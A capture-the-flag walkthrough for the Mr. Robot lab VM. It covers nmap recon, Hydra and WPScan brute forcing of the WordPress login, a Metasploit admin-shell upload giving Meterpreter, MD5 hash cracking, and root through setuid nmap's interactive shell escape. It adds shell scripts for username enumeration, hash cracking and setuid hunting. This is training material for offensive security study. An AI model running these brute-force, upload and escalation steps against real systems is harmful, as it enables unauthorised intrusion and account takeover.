Mr. Robot CTF Walkthrough
Information Gathering
netdiscover -i wlan0 - to find the target's address on the local network
nmap -O 192.168.1.108 - to scan the target and identify the OS and the open ports (add -sV if you also want service versions)
Vulnerability Assessment
Use web vulnerability scanners such as WPScan or Nikto to discover vulnerabilities:
wpscan --url http://192.168.1.108
nikto -h 192.168.1.108
Capturing the first flag
Open http://<IP>/robots.txt; it lists the files the site does not want indexed, which here means the first key and a dictionary file.
Use wget or Burp Suite to fetch both files, then open the first key:
wget http://<IP>/key-1-of-3.txt
wget http://<IP>/fsocity.dic
Optimizing the dictionary file
The dictionary file contains many duplicate entries, so deduplicate and sort it before using it.
This matters for the dictionary attack later: every duplicate is a wasted login attempt, so removing them shrinks the wordlist and cuts the cracking time.
sort -u fsocity.dic > Newfsocity.dic
(sort -u already removes duplicates; piping through uniq afterwards does nothing extra.)
Use the WPScan output (or just browse to /wp-login.php) to find the login page. We need a username and a password, and luckily we have the dictionary file.
To see exactly what the login form sends, intercept the request and identify the fields we need to brute force. Burp or ZAP both work; I am going to use Burp.
Point the browser at the Burp proxy, turn intercept on, enter any credentials on the login page and hit Log In.
Burp captures the POST request to /wp-login.php; note the parameter names it uses for the username and the password.
Now we need an online brute-force tool, one that attacks the live service; Hydra is a common choice and supports HTTP POST forms.
The fields we are going to use are log (username) and pwd (password).
The objective is to find a valid username first; once we have one we brute force its password.
hydra -V -L fsocity.dic -p test 192.168.1.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
This pattern works for most login forms: the path, then the POST body with ^USER^ and ^PASS^ placeholders, then a failure condition.
F=Invalid username tells Hydra that an attempt failed whenever the response contains that string. WordPress returns it only for usernames that do not exist, so every candidate Hydra reports as a hit is a username that does exist (the password "test" is only a placeholder). Check the exact wording of the error in Burp first; it has changed across WordPress versions.
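The username enumeration above works because the login page answers differently for unknown users, wrong passwords and successful logins. The shell functions below are an added example (not part of the original walkthrough) that classifies a wp-login.php reply the same way Hydra's F= condition does, and wraps curl so the same check can be run without Hydra. The three response snippets are constructed samples, not captures from the VM, and the cookie-name prefix wordpress_logged_in_ and the error strings are the ones WordPress used at the time of this box; verify them against a real response before relying on them.

```shell
#!/bin/sh
# Added example: classify wp-login.php responses like Hydra's F=<string> check.

# Constructed sample responses (headers+body as `curl -si` would return them).
WP_RESP_NOUSER='<div id="login_error"><strong>ERROR</strong>: Invalid username. <a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>'
WP_RESP_BADPASS='<div id="login_error"><strong>ERROR</strong>: The password you entered for the username <strong>elliot</strong> is incorrect.</div>'
WP_RESP_OK='HTTP/1.1 302 Found
Set-Cookie: wordpress_logged_in_abc123=elliot%7C1; path=/; HttpOnly
Location: http://192.168.1.108/wp-admin/'

# wp_login_outcome RESPONSE: print which of the three outcomes the reply matches.
# Order matters: a successful login never carries an error string, but check the
# cookie first anyway so a stray error in the page body cannot mask a real login.
wp_login_outcome() {
    case "$1" in
        *"wordpress_logged_in_"*) echo logged-in ;;     # auth cookie set
        *"Invalid username"*)     echo no-such-user ;;  # Hydra's F= string
        *"is incorrect"*)         echo user-exists ;;   # user real, password wrong
        *)                        echo unknown ;;
    esac
}

# wp_probe_user TARGET USER [PASS]: send one POST exactly as the captured form
# does and classify the reply. Needs network access and curl; not used offline.
wp_probe_user() {
    target="$1"; user="$2"; pass="${3:-test}"
    resp=$(curl -s -i "http://$target/wp-login.php" \
        --data-urlencode "log=$user" \
        --data-urlencode "pwd=$pass" \
        --data-urlencode "wp-submit=Log In")
    printf '%s %s\n' "$user" "$(wp_login_outcome "$resp")"
}

# wp_enum_users TARGET WORDLIST: print only the candidates that exist.
wp_enum_users() {
    target="$1"; wordlist="$2"
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        [ -n "$candidate" ] || continue
        out=$(wp_probe_user "$target" "$candidate")
        case "$out" in
            *" user-exists"|*" logged-in") printf '%s\n' "$out" ;;
        esac
    done < "$wordlist"
}
```

Run wp_enum_users 192.168.1.108 Newfsocity.dic to reproduce the Hydra step; the classifier is the part worth keeping, because once you know which string separates "no such user" from "wrong password" you can drive any tool with it.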
With the username known, use WPScan to crack the password, since it is faster for WordPress password attacks:
wpscan --url http://192.168.1.108 --wordlist /home/alexis/Desktop/fsocity.dic --username elliot
(--wordlist and --username are the flags of the WPScan version used here; current releases use -P <wordlist> and -U <user> instead.)
Exploitation
We can now log in. As admin I can install plugins, including a file manager, so the next step is to get a shell, maintain access and escalate privileges. One route is to upload a Weevely backdoor and use it for a reverse shell; the smarter route is Metasploit, which does the hard work of uploading the payload and hands us a Meterpreter session.
msfconsole
search wp_admin_shell
use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME elliot
set PASSWORD <password>
set RHOSTS 192.168.1.108
exploit
This gives us a Meterpreter session; its shell command drops into a command shell, but one with no TTY (terminal).
To get an interactive terminal shell, first type:
shell
Many people over-complicate the upgrade by spawning a pty through Python; an interactive sh is usually enough:
/bin/sh -i
If you need a real pseudo-terminal (su, for example, refuses to prompt for a password without one), use Python:
python -c 'import pty; pty.spawn("/bin/sh")'
Check who we are logged in as:
id
ls /home/robot
The directory holds two files, key-2-of-3.txt and password.raw-md5; the key is readable only by robot, but password.raw-md5 is world-readable.
cat password.raw-md5
It contains an MD5 hash of robot's password, which we can crack with hashcat or, because I am lazy, crackstation.net.
With the password recovered, switch to robot:
su robot
We can then view the second key:
cat /home/robot/key-2-of-3.txt
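For a single raw MD5 hash and a wordlist you already have, a few lines of shell do what hashcat or crackstation do here. This is an added example, not code from the walkthrough: it reads the user:hash layout of password.raw-md5, hashes each wordlist entry with md5sum (no trailing newline, which is what "raw-md5" means) and stops at the first match. The hash values in the usage comments are of the word "password" and are used only to show the format; md5sum is assumed to be available (it is part of GNU coreutils).

```shell
#!/bin/sh
# Added example: crack a raw-md5 hash against a wordlist with coreutils only.

# md5_of STRING: hex MD5 of STRING exactly as given (no newline appended).
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# hash_from_raw_md5_file PATH: pull the hash out of a "user:hash" file such
# as /home/robot/password.raw-md5, stripping stray whitespace and CRs.
hash_from_raw_md5_file() {
    cut -d: -f2 "$1" | tr -d ' \r\n'
}

# crack_raw_md5 HASH WORDLIST: print the first wordlist entry whose MD5 equals
# HASH and return 0; return 1 if the wordlist is exhausted. The hash may be
# upper- or lower-case hex; CRLF line endings in the wordlist are tolerated.
crack_raw_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    cr=$(printf '\r')
    while IFS= read -r word || [ -n "$word" ]; do
        word=${word%"$cr"}                 # drop Windows line ending if present
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Usage on the box (not run here):
#   crack_raw_md5 "$(hash_from_raw_md5_file password.raw-md5)" Newfsocity.dic
```

Every candidate forks md5sum, so this is fine for one hash and a deduplicated wordlist of a few thousand entries, which is exactly the situation here; for anything larger, hashcat with -m 0 is the right tool.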
Privilege Escalation
Now we need root access, also known as privilege escalation.
A common route is a binary owned by root with the setuid (SUID) bit set: it runs with root's privileges no matter who launches it.
We can use the find command to list them:
find / -perm -4000 -type f 2>/dev/null
nmap is in the list, so it runs as root.
Old nmap versions have an interactive mode that lets us run additional commands, which is enough to get root:
nmap --interactive
!sh - the interactive prompt's shell escape, which drops us into a root shell
id - and we are root!
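The find one-liner above returns every setuid binary, and the work is then spotting the one that can be abused. The functions below are an added example (not part of the original walkthrough) that runs the same search and flags hits whose name is on a small watchlist of programs with a known shell escape; the watchlist is a constructed list for illustration, with nmap on it because of its --interactive mode used here, and is not a complete catalogue.

```shell
#!/bin/sh
# Added example: enumerate setuid binaries and flag shell-escape candidates.

# Constructed watchlist of programs that can spawn a shell or read/write
# arbitrary files when setuid root (illustrative, not exhaustive).
SUID_WATCHLIST="nmap find vim vi less more bash sh python perl awk cp mv tee env"

# find_suid [ROOT]: print "mode owner path" for each setuid regular file
# under ROOT (default /), staying on one filesystem and ignoring errors.
find_suid() {
    root="${1:-/}"
    find "$root" -xdev -type f -perm -4000 -exec ls -l {} \; 2>/dev/null |
        awk '{ print $1, $3, $NF }'
}

# is_on_watchlist PATH: succeed if PATH's basename is in SUID_WATCHLIST.
is_on_watchlist() {
    name=$(basename "$1")
    for w in $SUID_WATCHLIST; do
        [ "$w" = "$name" ] && return 0
    done
    return 1
}

# flag_suid [ROOT]: like find_suid, but print only the watchlist hits.
flag_suid() {
    find_suid "$1" | while read -r mode owner path; do
        if is_on_watchlist "$path"; then
            printf '%s %s %s  <-- shell escape candidate\n' "$mode" "$owner" "$path"
        fi
    done
}
```

On the box, flag_suid / prints the nmap line; anything it prints is worth checking against GTFOBins before moving on. Owner matters as much as the bit: a setuid file owned by an unprivileged user only gets you that user.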
Go to the root folder and read the last key:
cd /root
Done